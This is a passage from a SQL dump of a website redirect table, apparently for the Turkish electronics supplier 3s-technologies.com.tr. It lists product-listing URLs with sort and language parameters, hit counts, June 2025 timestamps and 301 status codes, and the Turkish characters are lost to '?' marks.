00:00:00',301),(41398,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:36','0000-00-00 00:00:00',301),(41399,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name',NULL,'','',4,0,'2025-06-28 13:25:38','0000-00-00 00:00:00',301),(41400,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',4,0,'2025-06-28 13:25:40','0000-00-00 00:00:00',301),(41401,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:42','0000-00-00 00:00:00',301),(41402,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:44','0000-00-00 00:00:00',301),(41403,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',4,0,'2025-06-28 14:52:13','0000-00-00 00:00:00',301),(41404,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 14:52:19','0000-00-00 00:00:00',301),(41405,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/dirdesc',NULL,'','',4,0,'2025-06-28 14:52:25','0000-00-00 00:00:00',301),(41406,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 14:52:32','0000-00-00 00:00:00',301),(41407,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z?language=en-gb',NULL,'','',4,0,'2025-06-28 14:52:38','0000-00-00 00:00:00',301),(41408,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n',NULL,'','',4,0,'2025-06-28 14:52:42','0000-00-00 00:00:00',301),(41409,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 14:52:46','0000-00-00 00:00:00',301),(41410,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 14:52:53','0000-00-00 00:00:00',301),(41411,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_sku',NULL,'','',2,0,'2025-06-28 14:53:04','0000-00-00 00:00:00',301),(41412,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 14:54:59','0000-00-00 00:00:00',301),(41413,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 14:55:01','0000-00-00 00:00:00',301),(41414,'http://3s-technologies.com.tr/en/ah??leme-wood-processing-120cm',NULL,'','',4,0,'2025-06-28 16:22:51','0000-00-00 00:00:00',301),(41415,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 16:22:53','0000-00-00 00:00:00',301),(41416,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 16:23:27','0000-00-00 00:00:00',301),(41417,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:29','0000-00-00 00:00:00',301),(41418,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:31','0000-00-00 00:00:00',301),(41419,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku',NULL,'','',3,0,'2025-06-28 16:23:32','0000-00-00 00:00:00',301),(41420,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:34','0000-00-00 00:00:00',301),(41421,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/dirdesc',NULL,'','',3,0,'2025-06-28 16:23:36','0000-00-00 00:00:00',301),(41422,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:38','0000-00-00 00:00:00',301),(41423,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:40','0000-00-00 00:00:00',301),(41424,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??',NULL,'','',3,0,'2025-06-28 16:23:42','0000-00-00 00:00:00',301),(41425,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 16:23:43','0000-00-00 00:00:00',301),(41426,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 16:23:45','0000-00-00 00:00:00',301),(41427,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:47','0000-00-00 00:00:00',301),(41428,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:49','0000-00-00 00:00:00',301),(41429,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name',NULL,'','',3,0,'2025-06-28 16:23:51','0000-00-00 00:00:00',301),(41430,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 16:23:53','0000-00-00 00:00:00',301),(41431,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:55','0000-00-00 00:00:00',301),(41432,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',3,0,'2025-06-28 16:23:56','0000-00-00 00:00:00',301),(41433,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 16:24:07','0000-00-00 00:00:00',301),(41434,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 16:24:09','0000-00-00 00:00:00',301),(41435,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 16:24:11','0000-00-00 00:00:00',301),(41436,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-28 16:24:13','0000-00-00 00:00:00',301),(41437,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-28 18:24:09','0000-00-00 00:00:00',301),(41438,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 18:24:13','0000-00-00 00:00:00',301),(41439,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:15','0000-00-00 00:00:00',301),(41440,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:16','0000-00-00 00:00:00',301),(41441,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-28 18:24:18','0000-00-00 00:00:00',301),(41442,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 18:24:20','0000-00-00 00:00:00',301),(41443,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:22','0000-00-00 00:00:00',301),(41444,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:24','0000-00-00 00:00:00',301),(41445,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name',NULL,'','',2,0,'2025-06-28 18:24:25','0000-00-00 00:00:00',301),(41446,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 18:24:27','0000-00-00 00:00:00',301),(41447,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:24:29','0000-00-00 00:00:00',301),(41448,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:31','0000-00-00 00:00:00',301),(41449,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,ordering',NULL,'','',2,0,'2025-06-28 18:24:33','0000-00-00 00:00:00',301),(41450,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:35','0000-00-00 00:00:00',301),(41451,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-28 18:24:36','0000-00-00 00:00:00',301),(41452,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 18:24:38','0000-00-00 00:00:00',301),(41453,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:40','0000-00-00 00:00:00',301),(41454,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:24:42','0000-00-00 00:00:00',301),(41455,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name',NULL,'','',2,0,'2025-06-28 18:24:44','0000-00-00 00:00:00',301),(41456,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 18:24:45','0000-00-00 00:00:00',301),(41457,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:47','0000-00-00 00:00:00',301),(41458,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:49','0000-00-00 00:00:00',301),(41459,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_sku',NULL,'','',2,0,'2025-06-28 18:24:51','0000-00-00 00:00:00',301),(41460,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:53','0000-00-00 00:00:00',301),(41461,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/dirdesc',NULL,'','',2,0,'2025-06-28 18:24:54','0000-00-00 00:00:00',301),(41462,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:24:56','0000-00-00 00:00:00',301),(41463,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',2,0,'2025-06-28 18:24:58','0000-00-00 00:00:00',301),(41464,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-28 18:25:00','0000-00-00 00:00:00',301),(41465,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-detail',NULL,'','',2,0,'2025-06-28 18:25:02','0000-00-00 00:00:00',301),(41466,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-28 18:25:03','0000-00-00 00:00:00',301),(41467,'http://3s-technologies.com.tr/en/products/b?lgesel-lehimleme?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:05','0000-00-00 00:00:00',301),(41468,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/???ubuk-lehim',NULL,'','',2,0,'2025-06-28 18:25:07','0000-00-00 00:00:00',301),(41469,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',2,0,'2025-06-28 18:25:09','0000-00-00 00:00:00',301),(41470,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 18:25:11','0000-00-00 00:00:00',301),(41471,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 18:25:13','0000-00-00 00:00:00',301),(41472,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:15','0000-00-00 00:00:00',301),(41473,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 18:25:16','0000-00-00 00:00:00',301),(41474,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',2,0,'2025-06-28 18:25:18','0000-00-00 00:00:00',301),(41475,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 18:25:20','0000-00-00 00:00:00',301),(41476,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:22','0000-00-00 00:00:00',301),(41477,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:23','0000-00-00 00:00:00',301),(41478,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',2,0,'2025-06-28 18:25:25','0000-00-00 00:00:00',301),(41479,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-28 18:25:27','0000-00-00 00:00:00',301),(41480,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:29','0000-00-00 00:00:00',301),(41481,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:31','0000-00-00 00:00:00',301),(41482,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',3,0,'2025-06-28 18:25:32','0000-00-00 00:00:00',301),(41483,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:34','0000-00-00 00:00:00',301),(41484,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name',NULL,'','',3,0,'2025-06-28 18:25:36','0000-00-00 00:00:00',301),(41485,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 18:25:38','0000-00-00 00:00:00',301),(41486,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:40','0000-00-00 00:00:00',301),(41487,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:42','0000-00-00 00:00:00',301),(41488,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',2,0,'2025-06-28 18:25:43','0000-00-00 00:00:00',301),(41489,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:25:45','0000-00-00 00:00:00',301),(41490,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 18:25:47','0000-00-00 00:00:00',301),(41491,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:49','0000-00-00 00:00:00',301),(41492,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',1,0,'2025-06-28 18:25:51','0000-00-00 00:00:00',301),(41493,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:53','0000-00-00 00:00:00',301),(41494,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',1,0,'2025-06-28 18:25:54','0000-00-00 00:00:00',301),(41495,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:56','0000-00-00 00:00:00',301),(41496,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim?language=en-gb',NULL,'','',1,0,'2025-06-28 18:25:58','0000-00-00 00:00:00',301),(41497,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:00','0000-00-00 00:00:00',301),(41498,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:26:02','0000-00-00 00:00:00',301),(41499,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:03','0000-00-00 00:00:00',301),(41500,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-28 18:26:05','0000-00-00 00:00:00',301),(41501,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:26:07','0000-00-00 00:00:00',301),(41502,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:09','0000-00-00 00:00:00',301),(41503,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:11','0000-00-00 00:00:00',301),(41504,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-28 18:26:12','0000-00-00 00:00:00',301),(41505,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:14','0000-00-00 00:00:00',301),(41506,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-28 18:26:16','0000-00-00 00:00:00',301),(41507,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:26:18','0000-00-00 00:00:00',301),(41508,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:20','0000-00-00 00:00:00',301),(41509,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:26:22','0000-00-00 00:00:00',301),(41510,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-28 18:26:23','0000-00-00 00:00:00',301),(41511,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-28 18:29:04','0000-00-00 00:00:00',301),(41512,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:06','0000-00-00 00:00:00',301),(41513,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:09','0000-00-00 00:00:00',301),(41514,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:11','0000-00-00 00:00:00',301),(41515,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-28 18:29:13','0000-00-00 00:00:00',301),(41516,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:15','0000-00-00 00:00:00',301),(41517,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:17','0000-00-00 00:00:00',301),(41518,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:20','0000-00-00 00:00:00',301),(41519,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:22','0000-00-00 00:00:00',301),(41520,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:24','0000-00-00 00:00:00',301),(41521,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:26','0000-00-00 00:00:00',301),(41522,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z',NULL,'','',1,0,'2025-06-28 18:29:28','0000-00-00 00:00:00',301),(41523,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-28 18:29:30','0000-00-00 00:00:00',301),(41524,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:32','0000-00-00 00:00:00',301),(41525,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:34','0000-00-00 00:00:00',301),(41526,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-28 18:29:36','0000-00-00 00:00:00',301),(41527,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:38','0000-00-00 00:00:00',301),(41528,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:40','0000-00-00 00:00:00',301),(41529,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:43','0000-00-00 00:00:00',301),(41530,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-28 18:29:45','0000-00-00 00:00:00',301),(41531,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:47','0000-00-00 00:00:00',301),(41532,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:49','0000-00-00 00:00:00',301),(41533,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-28 18:29:52','0000-00-00 00:00:00',301),(41534,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:29:54','0000-00-00 00:00:00',301),(41535,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:56','0000-00-00 00:00:00',301),(41536,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-28 18:29:58','0000-00-00 00:00:00',301),(41537,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-28 18:30:00','0000-00-00 00:00:00',301),(41538,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 18:30:02','0000-00-00 00:00:00',301),(41539,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 18:30:05','0000-00-00 00:00:00',301),(41540,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 19:52:01','0000-00-00 00:00:00',301),(41541,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?language=en-gb',NULL,'','',21,0,'2025-06-28 19:52:05','0000-00-00 00:00:00',301),(41542,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-28 19:52:11','0000-00-00 00:00:00',301),(41543,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 19:52:15','0000-00-00 00:00:00',301),(41544,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-28 19:52:29','0000-00-00 00:00:00',301),(41545,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',3,0,'2025-06-28 19:52:39','0000-00-00 00:00:00',301),(41546,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name',NULL,'','',3,0,'2025-06-28 19:52:45','0000-00-00 00:00:00',301),(41547,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 19:52:49','0000-00-00 00:00:00',301),(41548,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku',NULL,'','',2,0,'2025-06-28 19:52:55','0000-00-00 00:00:00',301),(41549,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-28 19:53:02','0000-00-00 00:00:00',301),(41550,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??',NULL,'','',1,0,'2025-06-28 19:53:11','0000-00-00 00:00:00',301),(41551,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-28 19:53:14','0000-00-00 00:00:00',301),(41552,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-28 19:53:18','0000-00-00 00:00:00',301),(41553,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:21','0000-00-00 00:00:00',301),(41554,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:24','0000-00-00 